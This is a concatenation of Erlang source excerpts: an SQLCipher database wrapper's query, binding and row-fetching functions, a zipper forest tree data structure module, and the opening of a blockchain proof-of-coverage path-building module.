-spec set_update_hook(pid(), connection()) -> ok.
set_update_hook(Pid, Connection) ->
    set_update_hook(Pid, Connection, ?DEFAULT_TIMEOUT).
%% @doc Subscribe to notifications for row updates, insertions and deletions.
%% Messages will come in the shape of
%% `{Action, Database :: binary(), Table :: binary(), Id :: integer()}',
%% where `Action' will be either `insert', `update' or `delete' and `Id' will be
%% the affected row id (i.e. the `INTEGER PRIMARY KEY' if the table has one).
%% `Database' contains the name of the database on which the update occurred,
%% usually `main'.
-spec set_update_hook(pid(), Connection :: connection(), timeout()) -> ok.
set_update_hook(Pid, {connection, Connection, _}, Timeout) ->
    %% Pid is the process that will receive the update notifications.
    Ref = make_ref(),
    ok = esqlcipher_nif:set_update_hook(Connection, Ref, self(), Pid),
    receive_answer(Ref, Timeout).
%% @equiv exec(Sql, Connection, 5000)
-spec exec(sql(), connection()) -> ok | sqlite_error().
exec(Sql, Connection) ->
    exec(Sql, Connection, ?DEFAULT_TIMEOUT).
%% @doc Execute (simple or prepared) SQL statement without returning anything.
%%
%% The second form of invocation (with `Params') is equivalent to
%% {@link exec/4. `exec(Sql, Params, Connection, 5000)'}.
-spec exec(sql(), Connection :: connection(), timeout()) -> ok | sqlite_error()
        ; (sql(), [bind_value()], connection()) -> ok | sqlite_error().
%% First clause: (Sql, Connection, Timeout) — run Sql directly via the NIF.
exec(Sql, {connection, Connection, _}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:exec(Connection, Ref, self(), Sql),
    receive_answer(Ref, Timeout);
%% Second clause: (Sql, Params, Connection) — dispatched by the is_list guard
%% on the second argument; delegates to exec/4 with the default timeout.
exec(Sql, Params, {connection, _, _}=Connection) when is_list(Params) ->
    exec(Sql, Params, Connection, ?DEFAULT_TIMEOUT).
%% @doc Execute a prepared SQL statement without returning any rows.
%% @param Params values that are bound to the SQL statement
-spec exec(sql(), [bind_value()], connection(), timeout()) -> ok | sqlite_error().
exec(Sql, Params, {connection, _, _} = Conn, Timeout) when is_list(Params) ->
    %% Compile and bind in a single step, then run, discarding any rows.
    %% A failed prepare/bind raises badmatch here, as before.
    {ok, Stmt} = prepare_bind(Sql, Params, Conn, Timeout),
    run(Stmt, Timeout).
%% @equiv insert(Sql, Connection, 5000)
-spec insert(sql(), connection()) -> {ok, integer()} | sqlite_error().
insert(Sql, Connection) ->
    insert(Sql, Connection, ?DEFAULT_TIMEOUT).
%% @doc Insert records, returns the last inserted rowid.
%% `Sql' can be any `INSERT' statement. If the table has a column of type
%% `INTEGER PRIMARY KEY', the returned rowid will equal that primary key.
%% See also the sqlite3 docs for
%% <a href="https://sqlite.org/c3ref/last_insert_rowid.html">sqlite3_last_insert_rowid</a>.
-spec insert(sql(), Connection :: connection(), timeout()) -> {ok, integer()} | sqlite_error().
insert(Sql, {connection, Connection, _}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:insert(Connection, Ref, self(), Sql),
    receive_answer(Ref, Timeout).
%% @equiv prepare(Sql, Connection, Timeout)
-spec prepare(sql(), connection()) -> {ok, statement()} | sqlite_error().
prepare(Sql, Connection) ->
    prepare(Sql, Connection, ?DEFAULT_TIMEOUT).
%% @doc Prepare (that is, compile) an SQL statement.
%% Value placeholder can then be bound using {@link bind/3}. Or, you can do both
%% in one step using {@link prepare_bind/4}!
-spec prepare(sql(), connection(), timeout()) -> {ok, statement()} | sqlite_error().
prepare(Sql, {connection, Connection, _}=C, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:prepare(Connection, Ref, self(), Sql),
    case receive_answer(Ref, Timeout) of
        %% Wrap the NIF statement handle together with its owning connection
        %% so later calls (bind/reset/step) can address the right connection.
        {ok, Stmt} -> {ok, {statement, Stmt, C}};
        Else -> Else
    end.
%% @equiv bind(Statement, Args, 5000)
-spec bind(statement(), [bind_value()]) -> ok | sqlite_error().
bind(Statement, Values) ->
    bind(Statement, Values, ?DEFAULT_TIMEOUT).
%% @doc Bind values to a prepared statement created by {@link prepare/3}.
%% Note that you can also use {@link prepare_bind/4} to prepare and bind a
%% statement in one step.
%%
%% `nil' will be interpreted as `NULL'.
%% Use ``{'$blob', <<binary>>}'' for sqlite `BLOB's.
%% Since sqlite does not have a true boolean type, `true' and `false' are invalid;
%% use `1' and `0', respectively.
%%
%% All forms of bindings supported by sqlite3 are supported
%% (see also <a href="https://www.sqlite.org/lang_expr.html#varparam">sqlite3 docs</a>):
%% <ul>
%% <li>`?': Unnamed/anonymous parameters (these will implicitly be assigned a
%%      number that is the previously largest assigned number + 1; numbering
%%      begins at 1),</li>
%% <li>`?NNN', where 1 &#8804; `NNN' &#8804; 32766: Numbered parameters, and</li>
%% <li>`:AAA', where `AAA' is an alphanumeric identifier. These will internally
%%      be assigned a number similarly to anonymous parameters, so <b>do not
%%      mix named and numbered parameters</b> or you will probably get
%%      unexpected results.<br/>
%%      <small><i>Sqlite3 also supports the forms `@AAA' and `$AAA' but since
%%      the initial character (`@'/`$') is part of the name, you would
%%      actually need to pass ``{'@name', Value}'' or ``{'$name', Value}''.
%%      `{name, Value}' is automatically interpreted as ``{':name', Value}'',
%%      so the `:AAA' form should be preferred. Do not use `$blob' as a
%%      parameter name as ``{'$blob', _}'' tuple will be interpreted as the
%%      sqlite `BLOB' datatype.</i></small></li>
%% </ul>
%% Anonymous parameters of the form `?' are discouraged; <b>prefer named <i>or</i>
%% numbered parameters</b>.
%%
%% `Values' is a list of values that are bound to these parameters. Values can
%% either be a list of raw values or a list of tuples of the form `{N, Value}' or
%% `{name, Value}'. Of course, something like ``{myblob, {'$blob', <<"blob">>}}''
%% is allowed as well.
-spec bind(Statement :: statement(), [bind_value()], timeout()) -> ok | sqlite_error().
bind({statement, Stmt, {connection, Conn, _}}, Values, Timeout) ->
    Ref = make_ref(),
    %% bind_values/2 normalizes the mixed value list into {Name | N, Value}
    %% pairs before handing it to the NIF; numbering starts at 1.
    ok = esqlcipher_nif:bind(Conn, Stmt, Ref, self(), bind_values(Values, 1)),
    receive_answer(Ref, Timeout).
%% @doc Transforms a list of bind arguments into a list of tuples that carry
%% either a parameter name or a parameter index, following the
%% <a href="https://www.sqlite.org/lang_expr.html#varparam">sqlite3 scheme</a>:
%% explicitly numbered values keep their number (and push the implicit counter
%% past it), while named and raw values consume one implicit index each.
%% @private
-spec bind_values([bind_value()], pos_integer()) -> [{atom() | pos_integer(), sql_value()}].
bind_values([], _Next) ->
    [];
bind_values([{N, Value} | Rest], Next) when is_integer(N) ->
    %% Explicit index must be positive; crash (badmatch) otherwise.
    true = N > 0,
    Following = case N >= Next of
        true -> N + 1;
        false -> Next
    end,
    [{N, Value} | bind_values(Rest, Following)];
bind_values([{Name, Value} | Rest], Next) when is_atom(Name), Name =/= '$blob' ->
    %% Named parameter: keeps the name, but still consumes an implicit index.
    [{Name, Value} | bind_values(Rest, Next + 1)];
bind_values([Value | Rest], Next) ->
    %% Raw value (including {'$blob', _} blobs): gets the next implicit index.
    [{Next, Value} | bind_values(Rest, Next + 1)].
%% @equiv prepare_bind(Sql, Values, Connection, 5000)
-spec prepare_bind(sql(), [bind_value()], connection()) -> {ok, statement()} | sqlite_error().
prepare_bind(Sql, Values, Conn) ->
    prepare_bind(Sql, Values, Conn, ?DEFAULT_TIMEOUT).
%% @doc Prepare an SQL statement and bind values to it.
%% Equivalent to {@link prepare/3} followed by {@link bind/3} on the result.
-spec prepare_bind(sql(), [bind_value()], connection(), timeout()) -> {ok, statement()} | sqlite_error().
prepare_bind(Sql, [], {connection, _, _} = Conn, Timeout) ->
    %% Nothing to bind, so preparing alone suffices.
    prepare(Sql, Conn, Timeout);
prepare_bind(Sql, Values, {connection, _, _} = Conn, Timeout) ->
    case prepare(Sql, Conn, Timeout) of
        {error, _} = PrepError ->
            PrepError;
        {ok, Stmt} ->
            case bind(Stmt, Values, Timeout) of
                ok -> {ok, Stmt};
                {error, _} = BindError -> BindError
            end
    end.
%% @equiv reset(Statement, false, 5000)
-spec reset(statement()) -> ok | sqlite_error().
reset(Statement) ->
    reset(Statement, false, ?DEFAULT_TIMEOUT).
%% @equiv reset(Statement, ClearValues, 5000)
-spec reset(statement(), boolean() | timeout()) -> ok | sqlite_error().
%% The second argument is overloaded: a boolean means ClearValues, an
%% integer or `infinity' means Timeout. Dispatch is done by guard.
reset(Statement, ClearValues) when is_boolean(ClearValues) ->
    reset(Statement, ClearValues, ?DEFAULT_TIMEOUT);
reset(Statement, Timeout) when is_integer(Timeout); Timeout == infinity ->
    reset(Statement, false, Timeout).
%% @doc Reset the prepared statement back to its initial state.
%% Once the statement has been reset, you can run it once more. By default, any
%% values bound to the statement will be retained. Set `ClearValues' to `true'
%% to change this.
%% @param ClearValues whether to clear values bound to the statement
-spec reset(Statement :: statement(), boolean(), timeout()) -> ok | sqlite_error().
reset({statement, Stmt, {connection, Conn, _}}, ClearValues, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:reset(Conn, Stmt, Ref, self(), ClearValues),
    receive_answer(Ref, Timeout).
%% @doc attempt to fetch multiple results in one call.
%% Returns rows in reverse order. `$busy' means the database was locked mid
%% fetch; the rows gathered so far accompany the tag.
%% @private
-spec multi_step(statement(), pos_integer(), timeout()) ->
    {rows, [row()]} |
    {'$busy', [row()]} |
    {'$done', [row()]} |
    sqlite_error().
multi_step({statement, Stmt, {connection, Conn, _}}, ChunkSize, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:multi_step(Conn, Stmt, ChunkSize, Ref, self()),
    receive_answer(Ref, Timeout).
%% @doc retry `multi_step' a number of times if the database is busy.
%% Returns rows in reverse order. Gives up with `{error, {busy, _}}' after
%% `?MAX_TRIES' retries.
%% @private
-spec try_multi_step(statement(), pos_integer(), [row()], non_neg_integer(), timeout()) ->
    {rows, [row()]} | {'$done', [row()]} | sqlite_error().
try_multi_step(_Statement, _ChunkSize, _Rest, Tries, _Timeout) when Tries > ?MAX_TRIES ->
    {error, {busy, "database is busy"}};
try_multi_step(Statement, ChunkSize, Rest, Tries, Timeout) ->
    case multi_step(Statement, ChunkSize, Timeout) of
        {'$busy', Rows} ->
            % NB: It's possible that the database becomes busy only after a number
            % of rows have already been fetched.
            % Exponential backoff: 50 + 2^Tries * 10 milliseconds per retry.
            timer:sleep(50 + trunc(math:pow(2, Tries)) * 10),
            try_multi_step(Statement, ChunkSize, Rows ++ Rest, Tries + 1, Timeout);
        {rows, Rows} ->
            {rows, Rows ++ Rest};
        {'$done', Rows} ->
            {'$done', Rows ++ Rest};
        Else -> Else
    end.
%% @equiv fetch_chunk(Statement, ChunkSize, 5000)
-spec fetch_chunk(statement(), pos_integer()) -> {rows | '$done', [row()]} | sqlite_error().
fetch_chunk(Statement, ChunkSize) ->
    fetch_chunk(Statement, ChunkSize, ?DEFAULT_TIMEOUT).
%% @doc fetch a number of rows.
%% Can be called multiple times to fetch more rows.
%% @param Statement a prepared sql statement created by {@link prepare/3} or {@link prepare_bind/4}
%% @param ChunkSize is a number of rows to be read from sqlite and sent to erlang
%% @param Timeout timeout for the whole operation. Might need to be increased for very large chunks
%% @returns `{rows, [...]}' if more rows exist but where not fetched due to the `ChunkSize' limit;
%%   ``{'$done', [...]}'' if these where the last rows
-spec fetch_chunk(statement(), pos_integer(), timeout()) ->
    {rows | '$done', [row()]} | sqlite_error().
fetch_chunk(Statement, ChunkSize, Timeout) when ChunkSize > 0 ->
    try_multi_step(Statement, ChunkSize, [], 0, Timeout).
%% @equiv fetch_one(Statement, 5000)
-spec fetch_one(statement()) -> {ok, nil} | {ok, row()} | sqlite_error().
fetch_one(Statement) ->
    fetch_one(Statement, ?DEFAULT_TIMEOUT).
%% @doc fetch exactly one row of results. Returns `{ok, nil}' if the result is empty.
%% @param Statement a prepared sql statement created by {@link prepare/3} or {@link prepare_bind/4}
%% @returns `{ok, X}' if the statement was executed successfully where `X' is
%%   either a row in the shape of a list or `nil' if no rows where returned
-spec fetch_one(statement(), timeout()) -> {ok, nil} | {ok, row()} | sqlite_error().
fetch_one(Statement, Timeout) ->
    case fetch_chunk(Statement, 1, Timeout) of
        {error, _} = Error -> Error;
        {'$done', []} -> {ok, nil};
        {rows, [Row]} -> {ok, Row};
        %% A size-1 chunk may also come back already tagged `$done' when the
        %% fetched row happens to be the last one; accept it instead of
        %% raising a case_clause. (NOTE(review): depends on how the NIF tags
        %% a final partial chunk — confirm against esqlcipher_nif.)
        {'$done', [Row]} -> {ok, Row}
    end.
%% @equiv run(Statement, 5000)
-spec run(statement()) -> ok | sqlite_error().
run(Stmt) ->
    run(Stmt, ?DEFAULT_TIMEOUT).
%% @doc run a prepared statement, ignoring any possible results.
%% If you want to ensure that a query finishes correctly, returning exactly zero
%% rows, use:
%%
%% `{ok, nil} =' {@link fetch_one/2. `fetch_one'}`(Statement, Timeout)'
%%
%% @returns `ok' if the query finishes without an error,
%%   whether or not it returns any rows.
-spec run(statement(), timeout()) -> ok | sqlite_error().
run(Stmt, Timeout) ->
    Outcome = fetch_one(Stmt, Timeout),
    case Outcome of
        {ok, _Ignored} -> ok;
        Failure -> Failure
    end.
%% @equiv fetch_all(Statement, 5000, 5000)
-spec fetch_all(statement()) -> [row()] | sqlite_error().
fetch_all(Stmt) ->
    fetch_all(Stmt, ?DEFAULT_CHUNK_SIZE, ?DEFAULT_TIMEOUT).
%% @equiv fetch_all(Statement, ChunkSize, 5000)
-spec fetch_all(statement(), pos_integer()) -> [row()] | sqlite_error().
fetch_all(Stmt, ChunkSize) ->
    fetch_all(Stmt, ChunkSize, ?DEFAULT_TIMEOUT).
%% @doc Fetch all records
%% @param Statement a prepared sql statement created by {@link prepare/3} or {@link prepare_bind/4}
%% @param ChunkSize is a number of rows to be read from sqlite and sent to erlang in one bulk
%%   Decrease this value if rows are heavy. Default value is 5000 (`DEFAULT_CHUNK_SIZE').
%% @param Timeout is timeout per each request of one bulk
-spec fetch_all(statement(), pos_integer(), timeout()) -> [row()] | sqlite_error().
fetch_all(Stmt, ChunkSize, Timeout) ->
    case fetch_all_internal(Stmt, ChunkSize, [], Timeout) of
        {error, _} = Error -> Error;
        %% Chunks accumulate newest-first; flip once at the end.
        {'$done', Reversed} -> lists:reverse(Reversed)
    end.
%% @doc Accumulates chunks until the statement reports `$done'.
%% Rows are collected in reverse order.
%% @private
-spec fetch_all_internal(statement(), pos_integer(), [row()], timeout()) ->
    {'$done', [row()]} | sqlite_error().
fetch_all_internal(Stmt, ChunkSize, Acc, Timeout) ->
    case try_multi_step(Stmt, ChunkSize, Acc, 0, Timeout) of
        {rows, NewAcc} -> fetch_all_internal(Stmt, ChunkSize, NewAcc, Timeout);
        Final -> Final
    end.
%% @equiv changes(Connection, 5000)
%% Consistency fix: every other @equiv wrapper in this module carries a -spec;
%% this one was missing it.
-spec changes(connection()) -> integer().
changes(Connection) ->
    changes(Connection, ?DEFAULT_TIMEOUT).
%% @doc Return the number of the rows that have been modified, inserted, or
%% deleted by the last statement (see the
%% <a href="https://www.sqlite.org/c3ref/changes.html">sqlite3 docs</a> for
%% further information).
-spec changes(Connection :: connection(), timeout()) -> integer().
changes({connection, Connection, _}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:changes(Connection, Ref, self()),
    receive_answer(Ref, Timeout).
%% @equiv column_names(Statement, 5000)
-spec column_names(statement()) -> [binary()].
column_names(Statement) ->
    column_names(Statement, ?DEFAULT_TIMEOUT).
%% @doc Return the column names of the prepared statement.
-spec column_names(Statement :: statement(), timeout()) -> [binary()].
column_names({statement, Stmt, {connection, Conn, _}}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:column_names(Conn, Stmt, Ref, self()),
    %% Crash (badmatch) on any NIF error; success is the only accepted reply.
    {ok, ColumnNames} = receive_answer(Ref, Timeout),
    ColumnNames.
%% @equiv column_types(Statement, 5000)
-spec column_types(statement()) -> [binary()].
column_types(Stmt) ->
    column_types(Stmt, ?DEFAULT_TIMEOUT).
%% @doc Return the declared column types of the prepared statement.
%% Note that since sqlite3 is dynamically typed, actual column values need not
%% necessarily conform to the declared type
-spec column_types(statement(), timeout()) -> [binary()].
column_types({statement, Stmt, {connection, Conn, _}}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:column_types(Conn, Stmt, Ref, self()),
    {ok, ColumnTypes} = receive_answer(Ref, Timeout),
    ColumnTypes.
%% @equiv get_autocommit(Connection, 5000)
-spec get_autocommit(connection()) -> boolean().
get_autocommit(Connection) ->
    get_autocommit(Connection, ?DEFAULT_TIMEOUT).
%% @doc Returns whether the database is in <a href="https://sqlite.org/c3ref/get_autocommit.html">autocommit mode</a>.
%% Autocommit is normally enabled, except within transactions.
-spec get_autocommit(Connection :: connection(), timeout()) -> boolean().
get_autocommit({connection, Connection, _}, Timeout) ->
    Ref = make_ref(),
    ok = esqlcipher_nif:get_autocommit(Connection, Ref, self()),
    receive_answer(Ref, Timeout).
%% @equiv q(Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec q(sql(), connection()) -> [row()].
q(Sql, Conn) ->
    q(Sql, [], Conn, ?DEFAULT_TIMEOUT).
%% @equiv q(Sql, Args, Connection, 5000)
%% @throws sqlite_error()
-spec q(sql(), [bind_value()], connection()) -> [row()].
q(Sql, Args, Conn) ->
    q(Sql, Args, Conn, ?DEFAULT_TIMEOUT).
%% @doc Prepare statement, bind args and return a list of rows as result.
%% Errors are thrown, not returned.
%% @throws sqlite_error()
-spec q(sql(), [bind_value()], connection(), timeout()) -> [row()].
q(Sql, Args, Conn, Timeout) ->
    %% Any {error, _} from either step is converted into a throw so callers
    %% always receive a plain row list on the normal return path.
    Stmt = case prepare_bind(Sql, Args, Conn, Timeout) of
        {ok, S} -> S;
        {error, _} = PrepError -> throw(PrepError)
    end,
    case fetch_all(Stmt, ?DEFAULT_CHUNK_SIZE, Timeout) of
        {error, _} = FetchError -> throw(FetchError);
        Rows -> Rows
    end.
%% @equiv map(F, Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec map(map_function(Type), sql(), connection()) -> [Type].
map(F, Sql, {connection, _, _} = Connection) ->
    map(F, Sql, [], Connection, ?DEFAULT_TIMEOUT).
%% @equiv map(F, Sql, Args, Connection, 5000)
%% @throws sqlite_error()
-spec map(map_function(Type), sql(), [bind_value()], connection()) -> [Type].
map(F, Sql, Args, Connection) ->
    map(F, Sql, Args, Connection, ?DEFAULT_TIMEOUT).
%% @doc Map over all rows returned by the SQL query `Sql'.
%% @param F A function that takes either one parameter (a row) or two
%%   (a column name list and a row) and returns any kind of value
%% @param Sql an SQL query
%% @param Args values that are bound to `Sql'
%% @throws sqlite_error()
-spec map(map_function(Type), sql(), [bind_value()], connection(), timeout()) -> [Type].
map(F, Sql, Args, Connection, Timeout) ->
    case prepare_bind(Sql, Args, Connection, Timeout) of
        {ok, Statement} ->
            %% Column names are fetched once and reused for arity-2 callbacks.
            ColumnNames = column_names(Statement, Timeout),
            map_s(F, Statement, ColumnNames, Timeout);
        {error, _Msg} = Error ->
            throw(Error)
    end.
%% @doc Map function over statement results.
%% Clause selection depends on the callback's arity: arity-1 callbacks get
%% the row only, arity-2 callbacks also get the column name list.
%% @private
-spec map_s(map_function(Type), statement(), [binary()], timeout()) -> [Type].
map_s(F, Statement, ColNames, Timeout) when is_function(F, 1) ->
    case fetch_one(Statement, Timeout) of
        {ok, nil} -> [];
        {ok, Row} -> [F(Row) | map_s(F, Statement, ColNames, Timeout)];
        {error, _} = Error -> throw(Error)
    end;
map_s(F, Statement, ColNames, Timeout) when is_function(F, 2) ->
    case fetch_one(Statement, Timeout) of
        {ok, nil} -> [];
        {ok, Row} -> [F(ColNames, Row) | map_s(F, Statement, ColNames, Timeout)];
        {error, _} = Error -> throw(Error)
    end.
%% @equiv foreach(F, Sql, [], Connection, 5000)
%% @throws sqlite_error()
-spec foreach(foreach_function(), sql(), connection()) -> ok.
foreach(F, Sql, {connection, _, _} = Connection) ->
    foreach(F, Sql, [], Connection, ?DEFAULT_TIMEOUT).
%% @equiv foreach(F, Sql, Args, Connection, 5000)
%% @throws sqlite_error()
-spec foreach(foreach_function(), sql(), [bind_value()], connection()) -> ok.
foreach(F, Sql, Args, Connection) ->
    foreach(F, Sql, Args, Connection, ?DEFAULT_TIMEOUT).
%% @doc Execute a function for all rows returned by the SQL query `Sql'.
%% @param F A function that takes either one parameter (a row) or two
%%   (a column name list and a row). Return values are ignored.
%% @param Sql an SQL query
%% @param Args values that are bound to `Sql'
%% @throws sqlite_error()
-spec foreach(foreach_function(), sql(), [bind_value()], connection(), timeout()) -> ok.
foreach(F, Sql, Args, Connection, Timeout) ->
    case prepare_bind(Sql, Args, Connection, Timeout) of
        {ok, Statement} ->
            ColumnNames = column_names(Statement, Timeout),
            ok = foreach_s(F, Statement, ColumnNames, Timeout);
        {error, _Msg} = Error ->
            throw(Error)
    end.
%% @doc Run function for each row.
%% Like map_s/4, clause selection follows the callback's arity; the callback
%% is invoked for its side effects only.
%% @private
-spec foreach_s(foreach_function(), statement(), [binary()], timeout()) -> ok.
foreach_s(F, Statement, ColNames, Timeout) when is_function(F, 1) ->
    case fetch_one(Statement, Timeout) of
        {ok, nil} -> ok;
        {ok, Row} ->
            F(Row),
            foreach_s(F, Statement, ColNames, Timeout);
        {error, _} = Error -> throw(Error)
    end;
foreach_s(F, Statement, ColNames, Timeout) when is_function(F, 2) ->
    case fetch_one(Statement, Timeout) of
        {ok, nil} -> ok;
        {ok, Row} ->
            F(ColNames, Row),
            foreach_s(F, Statement, ColNames, Timeout);
        {error, _} = Error -> throw(Error)
    end.
%% @doc Wait for an answer for the request referred to by `Ref'.
%% Stale replies (tagged with a different ref, e.g. after an earlier timeout)
%% are logged and skipped, and the remaining timeout is recomputed so the
%% total wait never exceeds the caller's budget.
%% Throws `{error, timeout, Ref}' if no matching reply arrives in time.
%% @private
-spec receive_answer(reference(), timeout()) -> term().
receive_answer(Ref, Timeout) ->
    Start = os:timestamp(),
    receive
        {esqlcipher_raise, Ref, Error} ->
            error(Error);
        {esqlcipher, Ref, Resp} ->
            Resp;
        {Type, _, _} = StaleAnswer when (Type == esqlcipher) or (Type == esqlcipher_raise) ->
            error_logger:warning_msg("Esqlcipher: Ignoring stale answer ~p~n", [StaleAnswer]),
            %% Fix: `infinity' is a valid timeout() (see reset/2) and must not
            %% be fed into integer subtraction, which would raise badarith.
            NewTimeout = case Timeout of
                infinity ->
                    infinity;
                _ ->
                    PassedMics = timer:now_diff(os:timestamp(), Start) div 1000,
                    case Timeout - PassedMics of
                        Passed when Passed < 0 -> 0;
                        TO -> TO
                    end
            end,
            receive_answer(Ref, NewTimeout)
    after Timeout ->
        throw({error, timeout, Ref})
    end.
%% @author <NAME> <<EMAIL>> [http://ferd.ca/]
%% @doc Zipper forests are the zipper equivalent of a tree where each
%% node is a list of subtrees. The term is chosen because a forest, in graph
%% theory, means an undirected acyclic graphs, which is precisely the shape
%% such a tree can represent. The advantage of the zipper forest is that it
%% allows the graph/tree to be navigated in an iterative manner.
%% Potential uses of such a forest can be to represent a minimum spanning tree,
%% a DOM document, an undo tree, etc.
%% Adding, replacing and deleting items is done in amortized constant time.
%% Note that zippers are not search data structures.
%% @reference See <a href="http://ferd.ca/yet-another-article-on-zippers.html">
%% the related blog post</a> for more basic details on the concept of zippers
-module(zipper_forests).
-export([root/1, value/1,
         replace/2, insert/2, delete/1,
         prev/1, next/1, children/1, parent/1, rparent/1]).
-export_type([zipper_forest/0]).
%% A zlist is a list with a cursor: `Prev' holds the elements before the
%% cursor (nearest first), `Next' the element under the cursor and those after.
-type zlist(A) :: {Prev::list(A), Next::list(A)}.
-type znode() :: zlist({term(), zlist(_)}). % znode is a zlist of nodes
%% The thread is the stack of breadcrumbs left while descending into children.
-type thread() :: [znode()].
%% @type zipper_forest(). A zipper forest data structure.
-type zipper_forest() :: {thread(), znode()}.
%% @doc creates an empty zipper forest with <var>Val</var> as the first
%% element in it.
-spec root(Val::term()) -> zipper_forest().
root(Value) ->
    Node = {Value, {[], []}},
    {[], {[], [Node]}}.
%% @doc Extracts the node's value from the current tree position.
%% If no item exists at the current position, the atom <code>undefined</code>
%% is returned.
-spec value(zipper_forest()) -> {ok, term()} | undefined.
value({_Thread, {_Before, After}}) ->
    case After of
        [] -> undefined;
        [{Value, _Subtrees} | _Rest] -> {ok, Value}
    end.
%% @doc Replaces the value at the current tree position, without touching
%% the children nodes.
-spec replace(term(), zipper_forest()) -> zipper_forest().
replace(NewValue, {Thread, {Before, [Current | After]}}) ->
    {_OldValue, Subtrees} = Current,
    {Thread, {Before, [{NewValue, Subtrees} | After]}}.
%% @doc Add a new node at the current position with the value Val.
%% The new node has no children and becomes the current node.
-spec insert(term(), zipper_forest()) -> zipper_forest().
insert(Value, {Thread, {Before, After}}) ->
    Fresh = {Value, {[], []}},
    {Thread, {Before, [Fresh | After]}}.
%% @doc Deletes the node at the current position and its children.
%% The next one becomes the current position.
-spec delete(zipper_forest()) -> zipper_forest().
delete({Thread, {Before, [_Dropped | Rest]}}) ->
    {Thread, {Before, Rest}}.
%% @doc Moves to the previous node of the current level. If no
%% such node exists, the atom <code>undefined</code> is returned.
-spec prev(zipper_forest()) -> zipper_forest() | undefined.
prev({Thread, Level}) ->
    case Level of
        {[], _After} ->
            undefined;
        {[Nearest | Rest], After} ->
            {Thread, {Rest, [Nearest | After]}}
    end.
%% @doc Moves to the next node of the current level. If no
%% such node exists, the atom <code>undefined</code> is returned.
-spec next(zipper_forest()) -> zipper_forest() | undefined.
next({Thread, Level}) ->
    case Level of
        {_Before, []} ->
            undefined;
        {Before, [Current | Rest]} ->
            {Thread, {[Current | Before], Rest}}
    end.
%% @doc Goes down one level to the children of the current node.
%% If the current node is undefined, the atom <code>undefined</code>
%% is returned.
%% @end
%% To descend, the {Val, Children} tuple is split: the value is pushed onto
%% the thread as a breadcrumb while the children become the current level.
-spec children(zipper_forest()) -> zipper_forest() | undefined.
children({Thread, {Before, After}}) ->
    case After of
        [] ->
            undefined;
        [{Value, Subtrees} | Rest] ->
            Breadcrumb = {Before, [Value | Rest]},
            {[Breadcrumb | Thread], Subtrees}
    end.
%% @doc Moves up to the direct parent level. Doesn't rewind the current
%% level's child list. This means that if you have a tree, go to the
%% children, browse to the next element 2-3 times, then go back up and
%% down to the children again, you'll be at the same position you were
%% before. If no parent exists, the atom <code>undefined</code> is returned.
%% If you prefer the children to be <em>rewinded</em>, use
%% {@link rparent/1. <code>rparent/1</code>}
-spec parent(zipper_forest()) -> zipper_forest() | undefined.
parent({Thread, Subtrees}) ->
    case Thread of
        [] ->
            undefined;
        [{Before, [Value | After]} | Rest] ->
            %% Reattach the children to the value saved in the breadcrumb.
            {Rest, {Before, [{Value, Subtrees} | After]}}
    end.
%% @doc Moves up to the direct parent level, much like
%% {@link parent/1. <code>parent/1</code>}, However,
%% it rewinds the current level's list before doing so. This allows
%% the programmer to access children as if it were the first time,
%% all the time.
%% If no parent exists, the atom <code>undefined</code> is returned.
-spec rparent(zipper_forest()) -> zipper_forest() | undefined.
rparent({[], _Level}) ->
    undefined;
rparent({[{ParentBefore, [Value | ParentAfter]} | Thread], {Before, After}}) ->
    %% lists:reverse/2 is reverse(Before) ++ After: put the cursor back at
    %% the first child before storing the children under the parent value.
    Rewound = lists:reverse(Before, After),
    {Thread, {ParentBefore, [{Value, {[], Rewound}} | ParentAfter]}}.
%%%-----------------------------------------------------------------------------
%%% @doc blockchain_poc_path_v4 implementation.
%%%
%%% The way paths are built depends solely on witnessing data we have accumulated
%%% in the blockchain ledger.
%%%
%%% Assuming we already have a `TargetPubkeyBin` and `TargetRandState` using `target_v3:target`.
%%% We recursively start building a path starting at `TargetPubkeyBin`.
%%%
%%% Each potential hop's witnesses goes through the following checks:
%%%
%%% * Don't include any witnesses in any parent cell we've already visited
%%% * Don't include any witness whose parent is the same as the gateway we're looking at
%%% * Don't include any witness whose parent is too close to any of the indices we've already seen
%%% * Don't include any witness who have bad rssi range
%%% * Don't include any witness who are too far from the current gateway
%%% * Don't include any witness who do not have the required capability
%%%
%%% We then assign cumulative probabilities to each filtered witness. Each of those
%%% probabilities have an associated weight to them governed by chain variables.
%%% Currently supported weights are:
%%%
%%% * time_weight
%%% * rssi_weight
%%% * count_weight
%%% * randomness_wt
%%% * centrality_wt
%%%
%%% We scale these probabilities and run an ICDF to select the witness from
%%% the witness list. Once we have a potential next hop, we simply do the same process
%%% for the next hop and continue building till the path limit is reached or there
%%% are no more witnesses to continue with.
%%%
%%%-----------------------------------------------------------------------------
-module(blockchain_poc_path_v4).
-export([
    build/5
]).
-include("blockchain_utils.hrl").
-include("blockchain_vars.hrl").
-include("blockchain_caps.hrl").
%% A path is an ordered list of gateway public key binaries, target first.
-type path() :: [libp2p_crypto:pubkey_bin()].
%% Maps a witness pubkey to its (cumulative) selection probability.
-type prob_map() :: #{libp2p_crypto:pubkey_bin() => float()}.
%% @doc Build a path starting at `TargetPubkeyBin`.
%% Looks the target up in the ledger to seed the visited-location list, then
%% delegates to the recursive build_/7.
-spec build(TargetPubkeyBin :: libp2p_crypto:pubkey_bin(),
            TargetRandState :: rand:state(),
            Ledger :: blockchain:ledger(),
            HeadBlockTime :: pos_integer(),
            Vars :: map()) -> path().
build(TargetPubkeyBin, TargetRandState, Ledger, HeadBlockTime, Vars) ->
    TargetGw = find(TargetPubkeyBin, Ledger),
    TargetGwLoc = blockchain_ledger_gateway_v2:location(TargetGw),
    %% Seed the accumulators: the target's location is the first visited
    %% index, and the target itself is the first path element.
    build_(TargetPubkeyBin,
           Ledger,
           HeadBlockTime,
           Vars,
           TargetRandState,
           [TargetGwLoc],
           [TargetPubkeyBin]).
%%%-------------------------------------------------------------------
%% Helpers
%%%-------------------------------------------------------------------
